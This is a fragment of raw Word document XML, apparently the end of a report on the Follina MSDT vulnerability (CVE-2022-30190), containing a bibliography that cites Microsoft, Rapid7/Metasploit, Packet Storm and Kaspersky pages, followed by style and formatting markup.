          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msrc.microsoft.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 30, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DAF3FBD" w14:textId="24CB9993" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Tfosmark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Microsoft Lifecycle Policy,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>learn.microsoft.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/en-us/lifecycle/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31744FD4" w14:textId="5EDCB96F" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“Microsoft Office Word MSDTJS - Metasploit - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>InfosecMatter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>InfosecMatter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 29, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/fileformat/word_msdtjs_rce</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39DB9A01" w14:textId="5A700ED7" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Nao sec, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>mekalleh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, and bwatters-r7, “Microsoft Office Word MSDTJS,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Rapid7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 29, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_msdtjs_rce/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F1CBB62" w14:textId="10E286F8" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“Microsoft Office Word MSDTJS Code Execution ≈ Packet Storm,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>nwpc-ch.org</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, Jun. 07, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://nwpc-ch.org/exploits/microsoft-office-word-msdtjs-code-execution-packet-storm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D70C310" w14:textId="2220E46A" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>E. Team, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Follina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2022-30190): a vulnerability in MSDT,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>www.kaspersky.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 31, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://www.kaspersky.com/blog/follina-cve-2022-30190-msdt/44461/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F78A60E" w14:textId="77777777" w:rsidR="005F6209" w:rsidRPr="005F6209" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6986102B" w14:textId="63851465" w:rsidR="00BE1CAE" w:rsidRPr="003907CB" w:rsidRDefault="00BE1CAE" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D439193" w14:textId="77777777" w:rsidR="000E09FC" w:rsidRPr="003907CB" w:rsidRDefault="000E09FC" w:rsidP="003F7AC2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000E09FC" w:rsidRPr="003907CB" w:rsidSect="009001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41907"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE12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130189"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD024494"/>
    <w:lvl w:ilvl="0" w:tplc="F6AA64F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9A3369"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F93C29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871572"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBACC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097F37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D621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A86FEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F048B8DE"/>
    <w:lvl w:ilvl="0" w:tplc="9CE0EC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6183603">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1559316834">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1357459110">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="258828893">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="418841556">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="5789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1A5"/>
    <w:rsid w:val="00004359"/>
    <w:rsid w:val="00021EB4"/>
    <w:rsid w:val="000B3A0B"/>
    <w:rsid w:val="000C2B87"/>
    <w:rsid w:val="000E09FC"/>
    <w:rsid w:val="001258D5"/>
    <w:rsid w:val="001646CD"/>
    <w:rsid w:val="001B1A9D"/>
    <w:rsid w:val="001C6D69"/>
    <w:rsid w:val="002026DA"/>
    <w:rsid w:val="0027035D"/>
    <w:rsid w:val="002D3FA8"/>
    <w:rsid w:val="002E5E37"/>
    <w:rsid w:val="00302C3B"/>
    <w:rsid w:val="003078CE"/>
    <w:rsid w:val="0031505C"/>
    <w:rsid w:val="003157B2"/>
    <w:rsid w:val="0035550F"/>
    <w:rsid w:val="00365400"/>
    <w:rsid w:val="003907CB"/>
    <w:rsid w:val="003A6E23"/>
    <w:rsid w:val="003B654B"/>
    <w:rsid w:val="003E67CC"/>
    <w:rsid w:val="003F7AC2"/>
    <w:rsid w:val="00436AE5"/>
    <w:rsid w:val="004C5532"/>
    <w:rsid w:val="004D6A58"/>
    <w:rsid w:val="004E6948"/>
    <w:rsid w:val="005813F3"/>
    <w:rsid w:val="005D296A"/>
    <w:rsid w:val="005E0E24"/>
    <w:rsid w:val="005F6209"/>
    <w:rsid w:val="0064123C"/>
    <w:rsid w:val="006858C9"/>
    <w:rsid w:val="006F66D9"/>
    <w:rsid w:val="00722574"/>
    <w:rsid w:val="007A6C87"/>
    <w:rsid w:val="007C2017"/>
    <w:rsid w:val="007E0E25"/>
    <w:rsid w:val="007E7109"/>
    <w:rsid w:val="007F6C70"/>
    <w:rsid w:val="008C1682"/>
    <w:rsid w:val="008C3301"/>
    <w:rsid w:val="009001A3"/>
    <w:rsid w:val="00905D47"/>
    <w:rsid w:val="00953CEE"/>
    <w:rsid w:val="009614D3"/>
    <w:rsid w:val="00971DEC"/>
    <w:rsid w:val="00987314"/>
    <w:rsid w:val="00A238D7"/>
    <w:rsid w:val="00A3651E"/>
    <w:rsid w:val="00AE2765"/>
    <w:rsid w:val="00AF1BC9"/>
    <w:rsid w:val="00B03677"/>
    <w:rsid w:val="00B30EF5"/>
    <w:rsid w:val="00B4169B"/>
    <w:rsid w:val="00BC305B"/>
    <w:rsid w:val="00BE1CAE"/>
    <w:rsid w:val="00BE56C8"/>
    <w:rsid w:val="00BE5F52"/>
    <w:rsid w:val="00BE73C3"/>
    <w:rsid w:val="00C20E63"/>
    <w:rsid w:val="00CE329E"/>
    <w:rsid w:val="00D20989"/>
    <w:rsid w:val="00D33571"/>
    <w:rsid w:val="00D474EE"/>
    <w:rsid w:val="00D74528"/>
    <w:rsid w:val="00DA666B"/>
    <w:rsid w:val="00DC195A"/>
    <w:rsid w:val="00DD3F8B"/>
    <w:rsid w:val="00DE3B1A"/>
    <w:rsid w:val="00E115DF"/>
    <w:rsid w:val="00E143FD"/>
    <w:rsid w:val="00E220AA"/>
    <w:rsid w:val="00E6596D"/>
    <w:rsid w:val="00EB00F6"/>
    <w:rsid w:val="00EC21A5"/>
    <w:rsid w:val="00EF32E9"/>
    <w:rsid w:val="00F159B9"/>
    <w:rsid w:val="00F2280B"/>
    <w:rsid w:val="00F3526B"/>
    <w:rsid w:val="00F41899"/>
    <w:rsid w:val="00F47D57"/>
    <w:rsid w:val="00F74841"/>
    <w:rsid w:val="00FB6A0E"/>
    <w:rsid w:val="00FB7F11"/>
    <w:rsid w:val="00FD7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EB2EF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{782BE916-E703-4CAB-9994-BA02C6463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1A5"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00EC2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F6C70"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cve-version">
    <w:name w:val="cve-version"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007F6C70"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="textlayer--absolute">
    <w:name w:val="textlayer--absolute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008C3301"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F3526B"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:line="254" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:kern w:val="3"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F3526B"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F352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1939">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="102462613">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="376397522">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="426270124">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="520052015">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="673070987">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="780536409">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="798307460">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921137153">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="949433538">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="998925354">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1012728194">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1039669950">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
